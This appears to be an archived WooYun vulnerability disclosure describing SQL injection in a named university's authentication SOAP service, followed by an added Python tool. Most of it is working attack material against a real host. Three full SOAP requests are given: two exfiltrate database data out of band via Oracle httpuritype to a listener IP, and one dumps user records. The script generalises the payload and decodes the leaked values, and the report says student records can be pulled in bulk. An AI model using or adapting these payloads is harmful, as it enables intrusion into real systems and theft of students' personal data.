WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online archive -------------- http://drop.zone.ci/
2015-05-25: Details reported to the vendor, awaiting vendor handling. 2015-05-30: Vendor chose to ignore the vulnerability; details disclosed to the public.
A web service interface is vulnerable to SQL injection.
http://authentication.suda.edu.cn/authentication.asmx?op=getUserName
Appending a single quote to the pref parameter produces a database error:
A WAF is in place but can be bypassed. The backend is Oracle 10g and the application account runs with DBA privileges (the second request below confirms this by reading session_roles). Data is pulled out of band: httpuritype makes the database server itself issue an HTTP request to a listener at 203.7.28.101:20 with the query result appended to the URL, so nothing has to come back in the SOAP response.
Request 1: leak the database banner (v$version) via the out-of-band callback:

POST /authentication.asmx HTTP/1.1
Host: authentication.suda.edu.cn
Content-Type: application/soap+xml; charset=utf-8
Content-Length: 733

<?xml version="1.0" encoding="utf-8"?>
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
  <soap12:Body>
    <getUserName xmlns="http://tempuri.org/">
      <pref>'or (select cast(substr(httpuritype('http://203.7.28.101:20/'||(select(banner)from v$version where rownum=1)).getclob(),1,1000)as varchar(1000))from dual) is not null)--</pref>
      <count>200</count>
    </getUserName>
  </soap12:Body>
</soap12:Envelope>

Request 2: confirm the privilege level by leaking the first role starting with 'D' from session_roles (DBA):

POST /authentication.asmx HTTP/1.1
Host: authentication.suda.edu.cn
Content-Type: application/soap+xml; charset=utf-8
Content-Length: 570

<?xml version="1.0" encoding="utf-8"?>
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
  <soap12:Body>
    <getUserName xmlns="http://tempuri.org/">
      <pref>'or (select cast(substr(httpuritype('http://203.7.28.101:20/'||(select(role)from session_roles where role like 'D%' and rownum=1)).getclob(),1,1000)as varchar(1000))from dual) is not null)--</pref>
      <count>200</count>
    </getUserName>
  </soap12:Body>
</soap12:Envelope>

Request 3: a plain always-true condition, which makes the method return user records directly:

POST /authentication.asmx HTTP/1.1
Host: authentication.suda.edu.cn
Content-Type: application/soap+xml; charset=utf-8
Content-Length: 390

<?xml version="1.0" encoding="utf-8"?>
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
  <soap12:Body>
    <getUserName xmlns="http://tempuri.org/">
      <pref>'or 1=1)--</pref>
      <count>200</count>
    </getUserName>
  </soap12:Body>
</soap12:Envelope>
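The following is an added example written for this archive entry; it is not code from the original report. It generalises the three requests above: it wraps any scalar SELECT in the same httpuritype out-of-band pattern, builds the SOAP 1.2 POST with a correct Content-Length and proper XML escaping (a payload containing & or < would otherwise break the envelope before it ever reaches the SQL layer), and shows how the listener side recovers the leaked value from the request line it receives. The host, endpoint and callback address are the ones on the page; the function names and the sample request line fed to the decoder are constructed for illustration.

```python
"""Added example (not from the original report): build the getUserName SOAP
request with an Oracle httpuritype out-of-band payload and decode what the
database server sends to the attacker's listener.

Assumptions not stated on the page: the listener is a plain HTTP server whose
request line is all we need to read; the sample request line in __main__ is
constructed, not a real capture."""
from urllib.parse import unquote
from xml.sax.saxutils import escape

CALLBACK = "http://203.7.28.101:20/"      # listener address used in the report
TARGET_HOST = "authentication.suda.edu.cn"


def oob_payload(inner_select: str, callback: str = CALLBACK) -> str:
    """Wrap a scalar SELECT in the report's httpuritype pattern.

    The DB server itself fetches callback || <result>, so the value leaves in
    the path of an outbound HTTP request rather than in the SOAP reply. The
    trailing ')--' closes a parenthesis the original query evidently opens
    around the pref value and comments out the remainder of the statement.
    """
    return ("'or (select cast(substr(httpuritype('" + callback + "'||("
            + inner_select + ")).getclob(),1,1000)as varchar(1000))from dual)"
            " is not null)--")


def build_soap_request(pref: str, count: int = 200, host: str = TARGET_HOST) -> bytes:
    """Return the full HTTP/1.1 POST (SOAP 1.2) for getUserName.

    escape() converts &, < and > to entities so the XML stays well-formed;
    single quotes are left alone, exactly as in the report's payloads.
    """
    body = (
        '<?xml version="1.0" encoding="utf-8"?>'
        '<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" '
        'xmlns:xsd="http://www.w3.org/2001/XMLSchema" '
        'xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">'
        '<soap12:Body><getUserName xmlns="http://tempuri.org/">'
        f'<pref>{escape(pref)}</pref><count>{count}</count>'
        '</getUserName></soap12:Body></soap12:Envelope>'
    ).encode("utf-8")
    headers = (
        "POST /authentication.asmx HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/soap+xml; charset=utf-8\r\n"
        f"Content-Length: {len(body)}\r\n\r\n"
    ).encode("ascii")
    return headers + body


def decode_exfil(request_line: str) -> str:
    """Recover the leaked value from the request line the listener received.

    Oracle appends the SELECT result to the callback URL, so it arrives as the
    request path: 'GET /<value> HTTP/1.1'. An empty path means the inner SELECT
    returned NULL (or the row did not exist).
    """
    method, _, rest = request_line.partition(" ")
    path = rest.rsplit(" ", 1)[0]          # drop the trailing ' HTTP/1.x'
    if method != "GET" or not path.startswith("/"):
        raise ValueError(f"unexpected request line: {request_line!r}")
    return unquote(path[1:])


if __name__ == "__main__":
    req = build_soap_request(oob_payload("select(banner)from v$version where rownum=1"))
    print(req.decode())
    # Constructed sample of what the listener would log, not a real capture:
    print(decode_exfil("GET /Oracle%20Database%2010g%20Release%2010.2.0.1.0 HTTP/1.1"))
```

Two practitioner notes. First, the out-of-band channel works here because the page reports Oracle 10g: fine-grained network ACLs for UTL_HTTP and HttpUriType only arrived in 11g, so on 10g any account able to call the package can make the database host connect out. Second, the fix is not a better WAF rule; the pref value has to be bound as a parameter in the asmx handler, the application account should not hold DBA, and the database host should not be allowed arbitrary outbound HTTP.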
Increasing the count value returns student records in bulk:
(*_*)
Severity rating: no impact (vendor ignored)
Ignored at: 2015-05-30 20:58
Vendor response: none yet